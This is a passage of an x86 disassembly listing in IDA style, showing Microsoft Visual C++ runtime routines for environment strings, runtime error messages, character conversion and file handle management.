call ebp ; dword_42F180
mov esi, eax
cmp esi, ebx
jz loc_42B65C
loc_42B59A: ; CODE XREF: sub_42B533+59�j
cmp [esi], bx
mov eax, esi
jz short loc_42B5AF
loc_42B5A1: ; CODE XREF: sub_42B533+73�j
; sub_42B533+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_42B5A1
inc eax
inc eax
cmp [eax], bx
jnz short loc_42B5A1
loc_42B5AF: ; CODE XREF: sub_42B533+6C�j
sub eax, esi
mov edi, dword_42F0A4
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_42F0A4
mov ebp, eax
cmp ebp, ebx
jz short loc_42B600
push ebp
call sub_422F79
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_42B600
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_42F0A4
test eax, eax
jnz short loc_42B5FC
push [esp+18h+var_8]
call sub_4230B3
pop ecx
mov [esp+18h+var_8], ebx
loc_42B5FC: ; CODE XREF: sub_42B533+B9�j
mov ebx, [esp+18h+var_8]
loc_42B600: ; CODE XREF: sub_42B533+99�j
; sub_42B533+A8�j
push esi
call dword_42F188 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_42B65E
; ---------------------------------------------------------------------------
loc_42B60B: ; CODE XREF: sub_42B533+51�j
cmp eax, 2
jnz short loc_42B65C
loc_42B610: ; CODE XREF: sub_42B533+49�j
cmp edi, ebx
jnz short loc_42B620
call dword_42F184 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_42B65C
loc_42B620: ; CODE XREF: sub_42B533+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_42B630
loc_42B626: ; CODE XREF: sub_42B533+F6�j
; sub_42B533+FB�j
inc eax
cmp [eax], bl
jnz short loc_42B626
inc eax
cmp [eax], bl
jnz short loc_42B626
loc_42B630: ; CODE XREF: sub_42B533+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_422F79
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_42B646
xor esi, esi
jmp short loc_42B651
; ---------------------------------------------------------------------------
loc_42B646: ; CODE XREF: sub_42B533+10D�j
push ebp
push edi
push esi
call sub_4223F0
add esp, 0Ch
loc_42B651: ; CODE XREF: sub_42B533+111�j
push edi
call dword_42F18C ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_42B65E
; ---------------------------------------------------------------------------
loc_42B65C: ; CODE XREF: sub_42B533+39�j
; sub_42B533+61�j ...
xor eax, eax
loc_42B65E: ; CODE XREF: sub_42B533+D6�j
; sub_42B533+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_42B533 endp
; =============== S U B R O U T I N E =======================================
sub_42B665 proc near ; CODE XREF: sub_424FCB+9�p
; sub_424FF0+9�p
mov eax, dword_6313F4
cmp eax, 1
jz short loc_42B67C
test eax, eax
jnz short locret_42B69D
cmp dword_4496B4, 1
jnz short locret_42B69D
loc_42B67C: ; CODE XREF: sub_42B665+8�j
push 0FCh
call sub_42B69E
mov eax, dword_6315F4
pop ecx
test eax, eax
jz short loc_42B692
call eax ; dword_6315F4
loc_42B692: ; CODE XREF: sub_42B665+29�j
push 0FFh
call sub_42B69E
pop ecx
locret_42B69D: ; CODE XREF: sub_42B665+C�j
; sub_42B665+15�j
retn
sub_42B665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B69E proc near ; CODE XREF: sub_424FCB+12�p
; sub_424FF0+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_44BF38
loc_42B6B1: ; CODE XREF: sub_42B69E+20�j
cmp edx, [eax]
jz short loc_42B6C0
add eax, 8
inc ecx
cmp eax, offset dword_44BFC8
jl short loc_42B6B1
loc_42B6C0: ; CODE XREF: sub_42B69E+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_44BF38[esi]
jnz loc_42B7EE
mov eax, dword_6313F4
cmp eax, 1
jz loc_42B7C8
test eax, eax
jnz short loc_42B6F1
cmp dword_4496B4, 1
jz loc_42B7C8
loc_42B6F1: ; CODE XREF: sub_42B69E+44�j
cmp edx, 0FCh
jz loc_42B7EE
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_42F154 ; GetModuleFileNameA
test eax, eax
jnz short loc_42B728
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_423260
pop ecx
pop ecx
loc_42B728: ; CODE XREF: sub_42B69E+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_422120
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_42B76B
lea eax, [ebp+var_1A4]
push eax
call sub_422120
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4222F0
add esp, 10h
loc_42B76B: ; CODE XREF: sub_42B69E+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_423260
lea eax, [ebp+var_A0]
push edi
push eax
call sub_423270
lea eax, [ebp+var_A0]
push offset asc_42F9A4 ; "\n\n"
push eax
call sub_423270
push off_44BF3C[esi]
lea eax, [ebp+var_A0]
push eax
call sub_423270
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_42D64E
add esp, 2Ch
pop edi
jmp short loc_42B7EE
; ---------------------------------------------------------------------------
loc_42B7C8: ; CODE XREF: sub_42B69E+3C�j
; sub_42B69E+4D�j
lea eax, [ebp+arg_0]
lea esi, off_44BF3C[esi]
push 0
push eax
push dword ptr [esi]
call sub_422120
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_42F1D4 ; GetStdHandle
push eax
call dword_42F07C ; WriteFile
loc_42B7EE: ; CODE XREF: sub_42B69E+2E�j
; sub_42B69E+59�j ...
pop esi
leave
retn
sub_42B69E endp
; =============== S U B R O U T I N E =======================================
sub_42B7F1 proc near ; CODE XREF: sub_425014+6C�p
; sub_426826+32�p ...
arg_0 = dword ptr 4
inc dword_6313E8
push 1000h
call sub_422F79
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_42B81A
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_42B82B
; ---------------------------------------------------------------------------
loc_42B81A: ; CODE XREF: sub_42B7F1+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_42B82B: ; CODE XREF: sub_42B7F1+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_42B7F1 endp
; =============== S U B R O U T I N E =======================================
sub_42B835 proc near ; CODE XREF: sub_425014+61�p
; sub_42A86B+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_631AE0
jb short loc_42B844
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42B844: ; CODE XREF: sub_42B835+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_6319E0[ecx*4]
mov al, [ecx+eax*4+4]
and eax, 40h
retn
sub_42B835 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B85E proc near ; CODE XREF: sub_42512C+2D4�p
; sub_42512C+6B3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_63198C
push edi
push esi
call dword_42F200 ; InterlockedIncrement
mov edi, dword_42F1FC
xor ebx, ebx
cmp dword_631988, ebx
jz short loc_42B88E
push esi
call edi ; dword_42F1FC
push 13h
call sub_428436
pop ecx
push 1
pop ebx
loc_42B88E: ; CODE XREF: sub_42B85E+20�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42B8B7
pop ecx
mov [ebp+arg_4], eax
test ebx, ebx
pop ecx
jz short loc_42B8AC
push 13h
call sub_428497
pop ecx
jmp short loc_42B8AF
; ---------------------------------------------------------------------------
loc_42B8AC: ; CODE XREF: sub_42B85E+42�j
push esi
call edi ; dword_42F1FC
loc_42B8AF: ; CODE XREF: sub_42B85E+4C�j
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42B85E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B8B7 proc near ; CODE XREF: sub_42B85E+36�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_42B8C3
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42B8C3: ; CODE XREF: sub_42B8B7+8�j
cmp dword_6314C8, 0
jnz short loc_42B8DE
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_42B910
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42B8DE: ; CODE XREF: sub_42B8B7+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_449A44
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_6314D8
call dword_42F0A4 ; WideCharToMultiByte
test eax, eax
jz short loc_42B910
cmp [ebp+arg_0], 0
jz short loc_42B91E
loc_42B910: ; CODE XREF: sub_42B8B7+1E�j
; sub_42B8B7+51�j
call sub_426528
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_42B91E: ; CODE XREF: sub_42B8B7+57�j
pop ebp
retn
sub_42B8B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B920 proc near ; CODE XREF: sub_425A04+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_63198C
push edi
push esi
call dword_42F200 ; InterlockedIncrement
mov edi, dword_42F1FC
xor ebx, ebx
cmp dword_631988, ebx
jz short loc_42B950
push esi
call edi ; dword_42F1FC
push 13h
call sub_428436
pop ecx
push 1
pop ebx
loc_42B950: ; CODE XREF: sub_42B920+20�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42B97D
add esp, 0Ch
mov [ebp+arg_8], eax
test ebx, ebx
jz short loc_42B972
push 13h
call sub_428497
pop ecx
jmp short loc_42B975
; ---------------------------------------------------------------------------
loc_42B972: ; CODE XREF: sub_42B920+46�j
push esi
call edi ; dword_42F1FC
loc_42B975: ; CODE XREF: sub_42B920+50�j
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42B920 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B97D proc near ; CODE XREF: sub_42B920+39�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_42B9A0
cmp [ebp+arg_8], ebx
jz short loc_42B9A0
mov al, [esi]
cmp al, bl
jnz short loc_42B9A6
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_42B9A0
mov [eax], bx
loc_42B9A0: ; CODE XREF: sub_42B97D+C�j
; sub_42B97D+11�j ...
xor eax, eax
loc_42B9A2: ; CODE XREF: sub_42B97D+42�j
; sub_42B97D+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42B9A6: ; CODE XREF: sub_42B97D+17�j
cmp dword_6314C8, ebx
jnz short loc_42B9C1
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_42B9BC
movzx ax, al
mov [ecx], ax
loc_42B9BC: ; CODE XREF: sub_42B97D+36�j
; sub_42B97D+C1�j
push 1
pop eax
jmp short loc_42B9A2
; ---------------------------------------------------------------------------
loc_42B9C1: ; CODE XREF: sub_42B97D+2F�j
mov ecx, off_449838
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42BA1F
mov eax, dword_449A44
cmp eax, 1
jle short loc_42BA05
cmp [ebp+arg_8], eax
jl short loc_42BA0F
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_6314D8
call dword_42F098 ; MultiByteToWideChar
test eax, eax
mov eax, dword_449A44
jnz short loc_42B9A2
loc_42BA05: ; CODE XREF: sub_42B97D+5C�j
cmp [ebp+arg_8], eax
jb short loc_42BA0F
cmp [esi+1], bl
jnz short loc_42B9A2
loc_42BA0F: ; CODE XREF: sub_42B97D+61�j
; sub_42B97D+8B�j ...
call sub_426528
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_42B9A2
; ---------------------------------------------------------------------------
loc_42BA1F: ; CODE XREF: sub_42B97D+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_6314D8
call dword_42F098 ; MultiByteToWideChar
test eax, eax
jnz loc_42B9BC
jmp short loc_42BA0F
sub_42B97D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42BA50 proc near ; CODE XREF: sub_425A04+797�p
; sub_425A04+7E7�p
cmp cl, 40h
jnb short loc_42BA6A
cmp cl, 20h
jnb short loc_42BA60
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_42BA60: ; CODE XREF: sub_42BA50+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_42BA6A: ; CODE XREF: sub_42BA50+3�j
xor eax, eax
xor edx, edx
retn
sub_42BA50 endp
; =============== S U B R O U T I N E =======================================
sub_42BA6F proc near ; CODE XREF: sub_42647A+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_42BABB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_42BA8D
test al, 80h
jz short loc_42BABB
test al, 2
jnz short loc_42BABB
loc_42BA8D: ; CODE XREF: sub_42BA6F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_42BA9A
push esi
call sub_42B7F1
pop ecx
loc_42BA9A: ; CODE XREF: sub_42BA6F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_42BAAA
cmp dword ptr [esi+4], 0
jnz short loc_42BABB
inc eax
mov [esi], eax
loc_42BAAA: ; CODE XREF: sub_42BA6F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_42BAC1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_42BAC7
inc eax
mov [esi], eax
loc_42BABB: ; CODE XREF: sub_42BA6F+9�j
; sub_42BA6F+18�j ...
or eax, 0FFFFFFFFh
loc_42BABE: ; CODE XREF: sub_42BA6F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42BAC1: ; CODE XREF: sub_42BA6F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_42BAC7: ; CODE XREF: sub_42BA6F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_42BABE
sub_42BA6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BADD proc near ; CODE XREF: sub_42653A+5E�p
; sub_42ABB1+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F9E0
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_6315F8
xor ebx, ebx
cmp eax, ebx
jnz short loc_42BB4C
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_42F620
push esi
call dword_42F178 ; GetStringTypeW
test eax, eax
jz short loc_42BB2A
mov eax, esi
jmp short loc_42BB47
; ---------------------------------------------------------------------------
loc_42BB2A: ; CODE XREF: sub_42BADD+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset word_44D6A0
push esi
push ebx
call dword_42F17C ; GetStringTypeA
test eax, eax
jz loc_42BC12
push 2
pop eax
loc_42BB47: ; CODE XREF: sub_42BADD+4B�j
mov dword_6315F8, eax
loc_42BB4C: ; CODE XREF: sub_42BADD+2F�j
cmp eax, 2
jnz short loc_42BB75
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_42BB5D
mov eax, dword_6314C8
loc_42BB5D: ; CODE XREF: sub_42BADD+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_42F17C ; GetStringTypeA
jmp loc_42BC14
; ---------------------------------------------------------------------------
loc_42BB75: ; CODE XREF: sub_42BADD+72�j
cmp eax, 1
jnz loc_42BC12
cmp [ebp+arg_10], ebx
jnz short loc_42BB8B
mov eax, dword_6314D8
mov [ebp+arg_10], eax
loc_42BB8B: ; CODE XREF: sub_42BADD+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_42F098 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_42BC12
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4220C0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4221F0
add esp, 0Ch
jmp short loc_42BBE1
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_42BBE1: ; CODE XREF: sub_42BADD+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_42BC12
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_42F098 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_42BC12
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_42F178 ; GetStringTypeW
jmp short loc_42BC14
; ---------------------------------------------------------------------------
loc_42BC12: ; CODE XREF: sub_42BADD+61�j
; sub_42BADD+9B�j ...
xor eax, eax
loc_42BC14: ; CODE XREF: sub_42BADD+93�j
; sub_42BADD+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_42BADD endp
; =============== S U B R O U T I N E =======================================
sub_42BC26 proc near ; CODE XREF: sub_42BF9A:loc_42C112�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebx
push ebp
push esi
push edi
push 12h
or edi, 0FFFFFFFFh
call sub_428436
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov ebp, offset dword_6319E0
loc_42BC46: ; CODE XREF: sub_42BC26+BC�j
mov esi, [ebp+0]
test esi, esi
jz loc_42BCEA
lea eax, [esi+480h]
loc_42BC57: ; CODE XREF: sub_42BC26+8A�j
cmp esi, eax
jnb short loc_42BCCF
test byte ptr [esi+4], 1
jnz short loc_42BCA5
cmp dword ptr [esi+8], 0
jnz short loc_42BC8A
push 11h
call sub_428436
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_42BC82
lea eax, [esi+0Ch]
push eax
call dword_42F1CC ; InitializeCriticalSection
inc dword ptr [esi+8]
loc_42BC82: ; CODE XREF: sub_42BC26+4D�j
push 11h
call sub_428497
pop ecx
loc_42BC8A: ; CODE XREF: sub_42BC26+3F�j
lea ebx, [esi+0Ch]
push ebx
call dword_42F140 ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_42BCB2
push ebx
call dword_42F144 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_42BCA5: ; CODE XREF: sub_42BC26+39�j
mov eax, [ebp+0]
add esi, 24h
add eax, 480h
jmp short loc_42BC57
; ---------------------------------------------------------------------------
loc_42BCB2: ; CODE XREF: sub_42BC26+72�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [ebp+0]
push 24h
pop ecx
cdq
idiv ecx
mov edi, eax
add edi, [esp+18h+var_4]
cmp edi, 0FFFFFFFFh
jnz short loc_42BD38
mov ebx, [esp+18h+var_8]
loc_42BCCF: ; CODE XREF: sub_42BC26+33�j
add [esp+18h+var_4], 20h
add ebp, 4
inc ebx
cmp ebp, offset dword_631AE0
mov [esp+18h+var_8], ebx
jl loc_42BC46
jmp short loc_42BD38
; ---------------------------------------------------------------------------
loc_42BCEA: ; CODE XREF: sub_42BC26+25�j
mov esi, 480h
push esi
call sub_422F79
test eax, eax
pop ecx
jz short loc_42BD38
add dword_631AE0, 20h
lea ecx, ds:6319E0h[ebx*4]
lea edx, [eax+480h]
mov [ecx], eax
loc_42BD10: ; CODE XREF: sub_42BC26+104�j
cmp eax, edx
jnb short loc_42BD2C
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
jmp short loc_42BD10
; ---------------------------------------------------------------------------
loc_42BD2C: ; CODE XREF: sub_42BC26+EC�j
shl ebx, 5
mov edi, ebx
push edi
call sub_42BE86
pop ecx
loc_42BD38: ; CODE XREF: sub_42BC26+A3�j
; sub_42BC26+C2�j ...
push 12h
call sub_428497
pop ecx
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_42BC26 endp
; =============== S U B R O U T I N E =======================================
sub_42BD49 proc near ; CODE XREF: sub_42BF9A+1FD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_631AE0
push edi
jnb short loc_42BDAC
mov eax, ecx
sar eax, 5
lea edi, ds:6319E0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [eax+esi], 0FFFFFFFFh
jnz short loc_42BDAC
cmp dword_4496B4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_42BDA2
sub ecx, 0
jz short loc_42BD99
dec ecx
jz short loc_42BD94
dec ecx
jnz short loc_42BDA2
push ebx
push 0FFFFFFF4h
jmp short loc_42BD9C
; ---------------------------------------------------------------------------
loc_42BD94: ; CODE XREF: sub_42BD49+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_42BD9C
; ---------------------------------------------------------------------------
loc_42BD99: ; CODE XREF: sub_42BD49+3E�j
push ebx
push 0FFFFFFF6h
loc_42BD9C: ; CODE XREF: sub_42BD49+49�j
; sub_42BD49+4E�j
call dword_42F174 ; SetStdHandle
loc_42BDA2: ; CODE XREF: sub_42BD49+39�j
; sub_42BD49+44�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_42BDC2
; ---------------------------------------------------------------------------
loc_42BDAC: ; CODE XREF: sub_42BD49+C�j
; sub_42BD49+2B�j
call sub_426528
mov dword ptr [eax], 9
call sub_426531
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_42BDC2: ; CODE XREF: sub_42BD49+61�j
pop edi
pop esi
retn
sub_42BD49 endp
; =============== S U B R O U T I N E =======================================
sub_42BDC5 proc near ; CODE XREF: sub_426641+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_631AE0
push edi
jnb short loc_42BE2B
mov eax, ecx
sar eax, 5
lea edi, ds:6319E0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_42BE2B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_42BE2B
cmp dword_4496B4, 1
jnz short loc_42BE21
xor eax, eax
sub ecx, eax
jz short loc_42BE18
dec ecx
jz short loc_42BE13
dec ecx
jnz short loc_42BE21
push eax
push 0FFFFFFF4h
jmp short loc_42BE1B
; ---------------------------------------------------------------------------
loc_42BE13: ; CODE XREF: sub_42BDC5+44�j
push eax
push 0FFFFFFF5h
jmp short loc_42BE1B
; ---------------------------------------------------------------------------
loc_42BE18: ; CODE XREF: sub_42BDC5+41�j
push eax
push 0FFFFFFF6h
loc_42BE1B: ; CODE XREF: sub_42BDC5+4C�j
; sub_42BDC5+51�j
call dword_42F174 ; SetStdHandle
loc_42BE21: ; CODE XREF: sub_42BDC5+3B�j
; sub_42BDC5+47�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_42BE41
; ---------------------------------------------------------------------------
loc_42BE2B: ; CODE XREF: sub_42BDC5+C�j
; sub_42BDC5+2D�j ...
call sub_426528
mov dword ptr [eax], 9
call sub_426531
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_42BE41: ; CODE XREF: sub_42BDC5+64�j
pop edi
pop esi
retn
sub_42BDC5 endp
; =============== S U B R O U T I N E =======================================
sub_42BE44 proc near ; CODE XREF: sub_426641+7�p
; sub_426641+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_631AE0
jnb short loc_42BE6F
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_6319E0[ecx*4]
test byte ptr [ecx+eax*4+4], 1
lea eax, [ecx+eax*4]
jz short loc_42BE6F
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_42BE6F: ; CODE XREF: sub_42BE44+A�j
; sub_42BE44+26�j
call sub_426528
mov dword ptr [eax], 9
call sub_426531
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_42BE44 endp
; =============== S U B R O U T I N E =======================================
sub_42BE86 proc near ; CODE XREF: sub_4265E4+2A�p
; sub_426902+2A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov ecx, eax
and eax, 1Fh
sar ecx, 5
push esi
push edi
mov esi, dword_6319E0[ecx*4]
lea ebx, ds:6319E0h[ecx*4]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_42BED4
push 11h
call sub_428436
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_42BECC
lea eax, [esi+0Ch]
push eax
call dword_42F1CC ; InitializeCriticalSection
inc dword ptr [esi+8]
loc_42BECC: ; CODE XREF: sub_42BE86+37�j
push 11h
call sub_428497
pop ecx
loc_42BED4: ; CODE XREF: sub_42BE86+29�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call dword_42F140 ; RtlEnterCriticalSection
pop edi
pop esi
pop ebx
retn
sub_42BE86 endp
; =============== S U B R O U T I N E =======================================
sub_42BEE5 proc near ; CODE XREF: sub_4265E4+38�p
; sub_426902+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_6319E0[ecx*4]
lea eax, [ecx+eax*4+0Ch]
push eax
call dword_42F144 ; RtlLeaveCriticalSection
retn
sub_42BEE5 endp
; =============== S U B R O U T I N E =======================================
sub_42BF07 proc near ; CODE XREF: sub_4266EF+1E�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, dword_631AE0
push esi
push edi
jnb short loc_42BF88
mov eax, ebx
sar eax, 5
lea edi, ds:6319E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
test byte ptr [eax+esi+4], 1
jz short loc_42BF88
push ebx
call sub_42BE86
mov eax, [edi]
pop ecx
test byte ptr [eax+esi+4], 1
jz short loc_42BF6F
push ebx
call sub_42BE44
pop ecx
push eax
call dword_42F170 ; FlushFileBuffers
test eax, eax
jnz short loc_42BF62
call dword_42F068 ; RtlGetLastWin32Error
mov esi, eax
jmp short loc_42BF64
; ---------------------------------------------------------------------------
loc_42BF62: ; CODE XREF: sub_42BF07+4F�j
xor esi, esi
loc_42BF64: ; CODE XREF: sub_42BF07+59�j
test esi, esi
jz short loc_42BF7D
call sub_426531
mov [eax], esi
loc_42BF6F: ; CODE XREF: sub_42BF07+3D�j
call sub_426528
mov dword ptr [eax], 9
or esi, 0FFFFFFFFh
loc_42BF7D: ; CODE XREF: sub_42BF07+5F�j
push ebx
call sub_42BEE5
pop ecx
mov eax, esi
jmp short loc_42BF96
; ---------------------------------------------------------------------------
loc_42BF88: ; CODE XREF: sub_42BF07+D�j
; sub_42BF07+2D�j
